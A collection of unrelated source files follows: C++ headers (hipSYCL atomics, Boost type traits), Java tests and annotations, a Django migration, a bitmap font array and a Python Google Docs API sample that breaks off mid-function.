"hipSYCL/sycl/access.hpp" #include "hipSYCL/sycl/libkernel/backend.hpp" #include "hipSYCL/sycl/libkernel/host/atomic_builtins.hpp" #include "hipSYCL/sycl/libkernel/memory.hpp" #include "multi_ptr.hpp" #include "atomic_builtins.hpp" namespace hipsycl { namespace sycl { #ifdef HIPSYCL_EXT_FP_ATOMICS #define HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(template_param) \ std::enable_if_t<std::is_integral<template_param>::value || std::is_floating_point<t>::value>* = nullptr #else #define HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(template_param) \ std::enable_if_t<std::is_integral<template_param>::value>* = nullptr #endif template <typename T, access::address_space addressSpace = access::address_space::global_space> class atomic { static constexpr memory_scope default_scope() { if(addressSpace == access::address_space::global_space) return memory_scope::device; else if(addressSpace == access::address_space::local_space) return memory_scope::work_group; else if(addressSpace == access::address_space::private_space) return memory_scope::work_item; return memory_scope::device; } public: template <typename pointerT> HIPSYCL_UNIVERSAL_TARGET atomic(multi_ptr<pointerT, addressSpace> ptr) : _ptr{reinterpret_cast<T*>(ptr.get())} { static_assert(sizeof(T) == sizeof(pointerT), "Invalid pointer type for atomic<>"); } HIPSYCL_KERNEL_TARGET void store(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { detail::__hipsycl_atomic_store<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } HIPSYCL_KERNEL_TARGET T load(memory_order memoryOrder = memory_order::relaxed) const volatile { return detail::__hipsycl_atomic_load<addressSpace>(_ptr, memoryOrder, default_scope()); } HIPSYCL_KERNEL_TARGET T exchange(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_exchange<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ HIPSYCL_KERNEL_TARGET bool compare_exchange_strong(T &expected, T desired, memory_order successMemoryOrder = memory_order::relaxed, memory_order failMemoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_compare_exchange_strong<addressSpace>( _ptr, expected, desired, successMemoryOrder, failMemoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_add(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_add<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_sub(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_sub<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_and(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_and<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_or(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_or<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_xor(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_xor<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_min(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_min<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_max(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_max<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } private: T* _ptr; }; template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET void atomic_store(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { object.store(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_load(atomic<T, addressSpace> object, memory_order memoryOrder = memory_order::relaxed) { return object.load(memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_exchange(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.exchange(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET bool atomic_compare_exchange_strong(atomic<T, addressSpace> object, T &expected, T desired, memory_order successMemoryOrder = memory_order::relaxed, memory_order failMemoryOrder = memory_order::relaxed) { return object.compare_exchange_strong(expected, desired, successMemoryOrder, failMemoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_add(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_add(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_sub(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_sub(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_and(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_and(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_or(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_or(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_xor(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_xor(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_min(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_min(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_max(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_max(operand, memoryOrder); } } // namespace sycl } // namespace hipsycl #endif
3,815
1,682
/* Copyright (c) 2012 LinkedIn Corp. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.linkedin.data.collections; import java.util.Collection; import java.util.Map; import java.util.Set; import org.testng.annotations.Test; import static com.linkedin.data.collections.TestCommonMap.containsReferenceMap2; import static com.linkedin.data.collections.TestCommonMap.referenceMap1; import static com.linkedin.data.collections.TestCommonMap.referenceMap2; import static com.linkedin.data.collections.TestCommonMap.testAgainstReferenceMap1; import static org.testng.Assert.assertEquals; import static org.testng.Assert.assertFalse; import static org.testng.Assert.assertTrue; public class TestCowMap { @Test public void testCopyOnWrite() throws CloneNotSupportedException { CowMap<String, String> map1 = new CowMap<>(referenceMap1); testAgainstReferenceMap1(map1); assertEquals(map1.getRefCounted().getRefCount(), 0); CowMap<String,String> map2 = map1.clone(); assertEquals(map1.getRefCounted().getRefCount(), 1); assertTrue(map2.getRefCounted() == map1.getRefCounted()); testAgainstReferenceMap1(map2); assertEquals(map1.getRefCounted().getRefCount(), 1); assertTrue(map2.getRefCounted() == map1.getRefCounted()); CowMap<String,String> map3 = map1.clone(); assertEquals(map1.getRefCounted().getRefCount(), 2); assertTrue(map3.getRefCounted() == map1.getRefCounted()); testAgainstReferenceMap1(map3); assertEquals(map1.getRefCounted().getRefCount(), 2); assertTrue(map3.getRefCounted() == map1.getRefCounted()); map3.containsKey("a"); map3.containsKey("k1"); map3.containsValue(""); map3.containsValue("1"); map3.entrySet(); map3.get("a"); map3.get("k1"); map3.isEmpty(); map3.keySet(); map3.size(); map3.values(); map3.equals("a"); map3.equals(map1); map3.hashCode(); map3.toString(); assertTrue(map3.getRefCounted() == map1.getRefCounted()); map2.put("k4", "4"); assertEquals(map2.get("k4"), "4"); assertTrue(map2.containsKey("k4")); assertFalse(map1.containsKey("k4")); assertFalse(map3.containsKey("k4")); assertTrue(map3.getRefCounted() == map1.getRefCounted()); assertTrue(map2.getRefCounted() != map1.getRefCounted()); assertEquals(map1.getRefCounted().getRefCount(), 1); assertEquals(map2.getRefCounted().getRefCount(), 0); CowMap<String,String> map4 = map3.clone(); assertTrue(map4.getRefCounted() == map3.getRefCounted()); assertEquals(map3.getRefCounted().getRefCount(), 2); map4.clear(); assertEquals(map4.size(), 0); assertTrue(map4.isEmpty()); assertEquals(map3.getRefCounted().getRefCount(), 1); assertEquals(map4.getRefCounted().getRefCount(), 0); assertTrue(map4.getRefCounted() != map3.getRefCounted()); CowMap<String,String> map5 = map3.clone(); assertTrue(map5.getRefCounted() == map3.getRefCounted()); assertEquals(map3.getRefCounted().getRefCount(), 2); map5.putAll(referenceMap2); containsReferenceMap2(map5); assertEquals(map5.size(), referenceMap1.size() + referenceMap2.size()); assertEquals(map3.getRefCounted().getRefCount(), 1); assertEquals(map5.getRefCounted().getRefCount(), 0); assertTrue(map5.getRefCounted() != map3.getRefCounted()); CowMap<String,String> map6 = map3.clone(); assertTrue(map6.getRefCounted() == map3.getRefCounted()); assertEquals(map6.getRefCounted().getRefCount(), 2); map6.remove("k1"); assertFalse(map6.containsKey("k1")); assertEquals(map6.size(), referenceMap1.size() - 1); assertEquals(map3.getRefCounted().getRefCount(), 1); assertEquals(map6.getRefCounted().getRefCount(), 0); assertTrue(map6.getRefCounted() != map3.getRefCounted()); CowMap<String,String> map7 = map3.clone(); assertTrue(map7.getRefCounted() == map3.getRefCounted()); assertEquals(map7.getRefCounted().getRefCount(), 2); map7.containsKey("k1"); map7.containsValue("1"); map7.get("k1"); map7.isEmpty(); map7.size(); map7.hashCode(); map7.equals(map6); map7.toString(); assertTrue(map7.getRefCounted() == map3.getRefCounted()); map7.setReadOnly(); Set<Map.Entry<String,String>> set7 = map7.entrySet(); assertEquals(set7, map7.getRefCounted().getObject().entrySet()); Set<String> set7a = map7.keySet(); assertEquals(set7a, map7.getRefCounted().getObject().keySet()); Collection<String> c7 = map7.values(); assertEquals(c7, map7.getRefCounted().getObject().values()); assertTrue(map7.getRefCounted() == map3.getRefCounted()); map7.invalidate(); assertEquals(map3.getRefCounted().getRefCount(), 1); assertTrue(map7.getRefCounted() == null); Exception exc = null; CowMap<String,String> map8 = map3.clone(); assertTrue(map8.getRefCounted() == map3.getRefCounted()); assertEquals(map8.getRefCounted().getRefCount(), 2); Set<Map.Entry<String,String>> set8 = map8.entrySet(); assertEquals(set8, map8.getRefCounted().getObject().entrySet()); assertTrue(map8.getRefCounted() == map3.getRefCounted()); try { exc = null; set8.clear(); } catch (UnsupportedOperationException e) { exc = e; } assertTrue(exc != null); map8.invalidate(); CowMap<String,String> map9 = map3.clone(); assertTrue(map9.getRefCounted() == map3.getRefCounted()); assertEquals(map9.getRefCounted().getRefCount(), 2); Set<String> set9 = map9.keySet(); assertEquals(set9, map9.getRefCounted().getObject().keySet()); assertTrue(map9.getRefCounted() == map3.getRefCounted()); try { exc = null; set9.clear(); } catch (UnsupportedOperationException e) { exc = e; } assertTrue(exc != null); map9.invalidate(); CowMap<String,String> map10 = map3.clone(); assertTrue(map10.getRefCounted() == map3.getRefCounted()); assertEquals(map10.getRefCounted().getRefCount(), 2); Collection<String> c10 = map10.values(); assertEquals(c10, map10.getRefCounted().getObject().values()); assertTrue(map10.getRefCounted() == map3.getRefCounted()); try { exc = null; c10.clear(); } catch (UnsupportedOperationException e) { exc = e; } assertTrue(exc != null); map10.invalidate(); } }
2,669
2,542
// ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once #include <sal.h> #include <ktl.h> #include <KTpl.h> namespace Data { namespace LoggingReplicator { using ::_delete; } } // Version Manager Factory is a test class that is being exposed tp enable upper layer components to be tested. // DO NOT USE IT IN PRODUCTION. #include "VersionManagerFactory.h"
166
2,831
<reponame>189569400/ClickHouse #ifndef BOOST_TYPE_TRAITS_COPY_CV_HPP_INCLUDED #define BOOST_TYPE_TRAITS_COPY_CV_HPP_INCLUDED // // Copyright 2015 <NAME> // // Distributed under the Boost Software License, Version 1.0. // See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt // #include <boost/type_traits/is_const.hpp> #include <boost/type_traits/is_volatile.hpp> #include <boost/type_traits/add_const.hpp> #include <boost/type_traits/add_volatile.hpp> #include <boost/type_traits/conditional.hpp> namespace boost { template<class T, class U> struct copy_cv { private: typedef typename boost::conditional<boost::is_const<U>::value, typename boost::add_const<T>::type, T>::type CT; public: typedef typename boost::conditional<boost::is_volatile<U>::value, typename boost::add_volatile<CT>::type, CT>::type type; }; } // namespace boost #endif // #ifndef BOOST_TYPE_TRAITS_COPY_CV_HPP_INCLUDED
382
977
<reponame>pedropbazzo/graphql-spqr package io.leangen.graphql.annotations; import java.lang.annotation.ElementType; import java.lang.annotation.Inherited; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import io.leangen.graphql.execution.TypeResolver; @Inherited @Retention(RetentionPolicy.RUNTIME) @Target({ElementType.TYPE, ElementType.METHOD}) public @interface GraphQLTypeResolver { Class<? extends TypeResolver> value(); }
171
1,143
# -*- coding: utf-8 -*- # Generated by Django 1.11.13 on 2018-05-28 15:00 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ActiveTokenModel', fields=[ ('version', models.BigIntegerField()), ('name', models.CharField(max_length=255, primary_key=True, serialize=False)), ('owner', models.CharField(blank=True, max_length=255, null=True)), ('expirationTime', models.BigIntegerField(blank=True, null=True)), ('priority', models.FloatField(blank=True, null=True)), ('data', models.TextField(blank=True, null=True)), ], options={ 'abstract': False, 'db_table': 'active_tokens_MRSXMLLFNR3GS43QOJQW443LMV3GSY3IOVZQ____', }, ), migrations.CreateModel( name='ArchivedTokenModel', fields=[ ('version', models.BigIntegerField()), ('name', models.CharField(max_length=255, primary_key=True, serialize=False)), ('owner', models.CharField(blank=True, max_length=255, null=True)), ('expirationTime', models.BigIntegerField(blank=True, null=True)), ('priority', models.FloatField(blank=True, null=True)), ('data', models.TextField(blank=True, null=True)), ], options={ 'abstract': False, 'db_table': 'archived_tokens_MRSXMLLFNR3GS43QOJQW443LMV3GSY3IOVZQ____', }, ), migrations.CreateModel( name='CachedDataModel', fields=[ ('name', models.CharField(max_length=255, primary_key=True, serialize=False)), ('data', models.TextField(blank=True, null=True)), ], options={ 'db_table': 'cached_data_MRSXMLLFNR3GS43QOJQW443LMV3GSY3IOVZQ____', }, ), ]
1,077
507
<gh_stars>100-1000 /* * file './font-bin/dtk_erso_2__8x8.bin', filesize 1024bytes, linewidth=8bytes * array created from bin-file by bin2header * bin2header (c) 2013 <NAME>, <<EMAIL>> * */ uint8_t dtk_erso_2__8x8[1024] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7e, 0x81, 0xa5, 0x81, 0xa5, 0xbd, 0x81, 0x7e, 0x7e, 0xff, 0xdb, 0xff, 0xdb, 0xc3, 0xff, 0x7e, 0x36, 0x7f, 0x7f, 0x7f, 0x3e, 0x1c, 0x08, 0x00, 0x08, 0x1c, 0x3e, 0x7f, 0x3e, 0x1c, 0x08, 0x00, 0x1c, 0x3e, 0x1c, 0x7f, 0x7f, 0x3e, 0x1c, 0x3e, 0x08, 0x08, 0x1c, 0x3e, 0x7f, 0x3e, 0x1c, 0x3e, 0x00, 0x00, 0x18, 0x3c, 0x3c, 0x18, 0x00, 0x00, 0xff, 0xff, 0xe7, 0xc3, 0xc3, 0xe7, 0xff, 0xff, 0x00, 0x3c, 0x66, 0x42, 0x42, 0x66, 0x3c, 0x00, 0xff, 0xc3, 0x99, 0xbd, 0xbd, 0x99, 0xc3, 0xff, 0x1f, 0x07, 0x0f, 0x79, 0xcc, 0xcc, 0xcc, 0x78, 0x3c, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x7e, 0x18, 0x1c, 0x1e, 0x19, 0x1b, 0x3a, 0x70, 0xf0, 0xe0, 0x7f, 0x63, 0x7f, 0x63, 0xe3, 0xe7, 0xc7, 0x06, 0x99, 0x5a, 0x3c, 0xe7, 0xe7, 0x3c, 0x5a, 0x99, 0x40, 0x70, 0x7c, 0x7f, 0x7c, 0x70, 0x40, 0x00, 0x01, 0x07, 0x1f, 0x7f, 0x1f, 0x07, 0x01, 0x00, 0x18, 0x3c, 0x7e, 0x18, 0x18, 0x7e, 0x3c, 0x18, 0x66, 0x66, 0x66, 0x66, 0x66, 0x00, 0x66, 0x00, 0x7f, 0xdb, 0xdb, 0x7b, 0x1b, 0x1b, 0x19, 0x00, 0x1e, 0x31, 0x1c, 0x36, 0x36, 0x1c, 0x46, 0x3c, 0x00, 0x00, 0x00, 0x7e, 0x7e, 0x7e, 0x00, 0x00, 0x18, 0x3c, 0x7e, 0x18, 0x7e, 0x3c, 0x18, 0xff, 0x0c, 0x1e, 0x3f, 0x0c, 0x0c, 0x0c, 0x0c, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x3f, 0x1e, 0x0c, 0x00, 0x00, 0x0c, 0x06, 0x7f, 0x06, 0x0c, 0x00, 0x00, 0x00, 0x18, 0x30, 0x7f, 0x30, 0x18, 0x00, 0x00, 0x00, 0x00, 0x60, 0x60, 0x60, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x24, 0x66, 0xff, 0x66, 0x24, 0x00, 0x00, 0x00, 0x18, 0x3c, 0x7f, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x7e, 0x3c, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3c, 0x3c, 0x18, 0x18, 0x00, 0x18, 0x00, 0x36, 0x36, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x36, 0x7f, 0x36, 0x7f, 0x36, 0x36, 0x00, 0x0c, 0x3f, 0x68, 0x3e, 0x0b, 0x7e, 0x18, 0x08, 0x62, 0x66, 0x0c, 0x18, 0x30, 0x66, 0x46, 0x00, 0x1c, 0x36, 0x1c, 0x18, 0x3d, 0x66, 0x3d, 0x00, 0x18, 0x18, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x18, 0x30, 0x30, 0x30, 0x18, 0x0c, 0x00, 0x30, 0x18, 0x0c, 0x0c, 0x0c, 0x18, 0x30, 0x00, 0x00, 0x42, 0x3c, 0x7e, 0x3c, 0x42, 0x00, 0x00, 0x00, 0x18, 0x18, 0x7e, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x30, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x03, 0x06, 0x0c, 0x18, 0x30, 0x60, 0x40, 0x00, 0x3e, 0x67, 0x6f, 0x7b, 0x73, 0x63, 0x3e, 0x00, 0x0c, 0x1c, 0x0c, 0x0c, 0x0c, 0x0c, 0x3f, 0x00, 0x3c, 0x66, 0x06, 0x1c, 0x30, 0x66, 0x7e, 0x00, 0x3c, 0x66, 0x06, 0x1c, 0x06, 0x66, 0x3c, 0x00, 0x0e, 0x1e, 0x36, 0x66, 0x7f, 0x06, 0x06, 0x00, 0x7e, 0x60, 0x7c, 0x06, 0x06, 0x66, 0x3c, 0x00, 0x3c, 0x66, 0x60, 0x7c, 0x66, 0x66, 0x3c, 0x00, 0x7e, 0x66, 0x06, 0x0c, 0x18, 0x18, 0x18, 0x00, 0x3c, 0x66, 0x66, 0x3c, 0x66, 0x66, 0x3c, 0x00, 0x3c, 0x66, 0x66, 0x3e, 0x06, 0x66, 0x3c, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x30, 0x0c, 0x18, 0x30, 0x60, 0x30, 0x18, 0x0c, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x30, 0x18, 0x0c, 0x06, 0x0c, 0x18, 0x30, 0x00, 0x3c, 0x66, 0x66, 0x0c, 0x18, 0x00, 0x18, 0x00, 0x3e, 0x63, 0x6f, 0x6b, 0x6f, 0x60, 0x3e, 0x00, 0x18, 0x3c, 0x66, 0x66, 0x7e, 0x66, 0x66, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x33, 0x33, 0x7e, 0x00, 0x1f, 0x33, 0x60, 0x60, 0x60, 0x33, 0x1e, 0x00, 0x7c, 0x36, 0x33, 0x33, 0x33, 0x36, 0x7c, 0x00, 0x7f, 0x31, 0x34, 0x3c, 0x34, 0x31, 0x7f, 0x00, 0x7f, 0x31, 0x34, 0x3c, 0x34, 0x30, 0x78, 0x00, 0x1f, 0x33, 0x60, 0x60, 0x67, 0x33, 0x1f, 0x00, 0x66, 0x66, 0x66, 0x7e, 0x66, 0x66, 0x66, 0x00, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x0f, 0x06, 0x06, 0x06, 0x66, 0x66, 0x3c, 0x00, 0x7b, 0x33, 0x36, 0x3c, 0x36, 0x33, 0x7b, 0x00, 0x78, 0x30, 0x30, 0x30, 0x31, 0x33, 0x7f, 0x00, 0x63, 0x77, 0x7f, 0x7f, 0x6b, 0x63, 0x63, 0x00, 0x63, 0x73, 0x7b, 0x6f, 0x67, 0x63, 0x63, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x30, 0x30, 0x78, 0x00, 0x3c, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x0f, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x3c, 0x36, 0x73, 0x00, 0x3c, 0x66, 0x60, 0x3c, 0x06, 0x66, 0x3c, 0x00, 0x7e, 0x5a, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x00, 0x63, 0x63, 0x63, 0x6b, 0x7f, 0x77, 0x22, 0x00, 0x63, 0x63, 0x36, 0x1c, 0x36, 0x63, 0x63, 0x00, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x18, 0x3c, 0x00, 0x7f, 0x63, 0x46, 0x0c, 0x19, 0x33, 0x7f, 0x00, 0x3c, 0x30, 0x30, 0x30, 0x30, 0x30, 0x3c, 0x00, 0x60, 0x30, 0x18, 0x0c, 0x06, 0x03, 0x01, 0x00, 0x3c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x3c, 0x00, 0x08, 0x1c, 0x36, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x18, 0x18, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x06, 0x3e, 0x26, 0x3b, 0x00, 0x70, 0x30, 0x30, 0x3e, 0x33, 0x33, 0x3e, 0x00, 0x00, 0x00, 0x3c, 0x66, 0x60, 0x62, 0x3c, 0x00, 0x0e, 0x06, 0x06, 0x3e, 0x66, 0x66, 0x3e, 0x00, 0x00, 0x00, 0x3c, 0x66, 0x7e, 0x60, 0x3c, 0x00, 0x1c, 0x36, 0x30, 0x78, 0x30, 0x30, 0x78, 0x00, 0x00, 0x00, 0x3e, 0x66, 0x66, 0x3e, 0x06, 0x7c, 0x70, 0x30, 0x36, 0x3f, 0x33, 0x33, 0x73, 0x00, 0x18, 0x00, 0x38, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x06, 0x00, 0x06, 0x06, 0x06, 0x66, 0x66, 0x3c, 0x70, 0x30, 0x33, 0x36, 0x3c, 0x36, 0x73, 0x00, 0x38, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x66, 0x7f, 0x6b, 0x6b, 0x63, 0x00, 0x00, 0x00, 0x7c, 0x7e, 0x66, 0x66, 0x66, 0x00, 0x00, 0x00, 0x3c, 0x66, 0x66, 0x66, 0x3c, 0x00, 0x00, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x30, 0x78, 0x00, 0x00, 0x3e, 0x66, 0x66, 0x3e, 0x06, 0x0f, 0x00, 0x00, 0x6f, 0x3b, 0x30, 0x30, 0x78, 0x00, 0x00, 0x00, 0x3e, 0x60, 0x3c, 0x06, 0x7c, 0x00, 0x18, 0x18, 0x7e, 0x18, 0x18, 0x1b, 0x0e, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x3b, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x00, 0x00, 0x00, 0x63, 0x63, 0x6b, 0x7f, 0x36, 0x00, 0x00, 0x00, 0x63, 0x36, 0x1c, 0x36, 0x63, 0x00, 0x00, 0x00, 0xe6, 0x66, 0x66, 0x3e, 0x06, 0x7c, 0x00, 0x00, 0x7e, 0x4c, 0x18, 0x32, 0x7e, 0x00, 0x0e, 0x18, 0x18, 0x70, 0x18, 0x18, 0x0e, 0x00, 0x18, 0x18, 0x18, 0x00, 0x18, 0x18, 0x18, 0x00, 0x70, 0x18, 0x18, 0x0e, 0x18, 0x18, 0x70, 0x00, 0x31, 0x49, 0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd8, 0x1c, 0x36, 0x63, 0x63, 0x7f, 0x00 };
4,855
10,225
<filename>integration-tests/oidc/src/test/java/io/quarkus/it/keycloak/BearerTokenAuthorizationInGraalITCase.java package io.quarkus.it.keycloak; import io.quarkus.test.junit.NativeImageTest; @NativeImageTest public class BearerTokenAuthorizationInGraalITCase extends BearerTokenAuthorizationTest { }
103
2,293
#!/usr/bin/python # # Copyright (C) 2007, 2009 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __author__ = ('api.jfisher (<NAME>), ' 'e.bidelman (<NAME>)') import sys import re import os.path import getopt import getpass import gdata.docs.service import gdata.spreadsheet.service def truncate(content, length=15, suffix='...'): if len(content) <= length: return content else: return content[:length] + suffix class DocsSample(object): """A DocsSample object demonstrates the Document List feed.""" def __init__(self, email, password): """Constructor for the DocsSample object. Takes an email and password corresponding to a gmail account to demonstrate the functionality of the Document List feed. Args: email: [string] The e-mail address of the account to use for the sample. password: [string] The password corresponding to the account specified by the email parameter. Returns: A DocsSample object used to run the sample demonstrating the functionality of the Document List feed. """ source = 'Document List Python Sample' self.gd_client = gdata.docs.service.DocsService() self.gd_client.ClientLogin(email, password, source=source) # Setup a spreadsheets service for downloading spreadsheets self.gs_client = gdata.spreadsheet.service.SpreadsheetsService() self.gs_client.ClientLogin(email, password, source=source) def _PrintFeed(self, feed): """Prints out the contents of a feed to the console. Args: feed: A gdata.docs.DocumentListFeed instance. """ print '\n' if not feed.entry: print 'No entries in feed.\n' print '%-18s %-12s %s' % ('TITLE', 'TYPE', 'RESOURCE ID') for entry in feed.entry: print '%-18s %-12s %s' % (truncate(entry.title.text.encode('UTF-8')), entry.GetDocumentType(), entry.resourceId.text) def _GetFileExtension(self, file_name): """Returns the uppercase file extension for a file. Args: file_name: [string] The basename of a filename. Returns: A string containing the file extension of the file. """ match = re.search('.*\.([a-zA-Z]{3,}$)', file_name) if match: return match.group(1).upper() return False def _UploadMenu(self): """Prompts that enable a user to upload a file to the Document List feed.""" file_path = '' file_path = raw_input('Enter path to file: ') if not file_path: return elif not os.path.isfile(file_path): print 'Not a valid file.' return file_name = os.path.basename(file_path) ext = self._GetFileExtension(file_name) if not ext or ext not in gdata.docs.service.SUPPORTED_FILETYPES: print 'File type not supported. Check the file extension.' return else: content_type = gdata.docs.service.SUPPORTED_FILETYPES[ext] title = '' while not title: title = raw_input('Enter name for document: ') try: ms = gdata.MediaSource(file_path=file_path, content_type=content_type) except IOError: print 'Problems reading file. Check permissions.' return if ext in ['CSV', 'ODS', 'XLS', 'XLSX']: print 'Uploading spreadsheet...' elif ext in ['PPT', 'PPS']: print 'Uploading presentation...' else: print 'Uploading word processor document...' entry = self.gd_client.Upload(ms, title) if entry: print 'Upload successful!' print 'Document now accessible at:', entry.GetAlternateLink().href else: print 'Upload error.' def _DownloadMenu(self): """Prompts that enable a user to download a local copy of a document.""" resource_id = '' resource_id = raw_input('Enter an resource id: 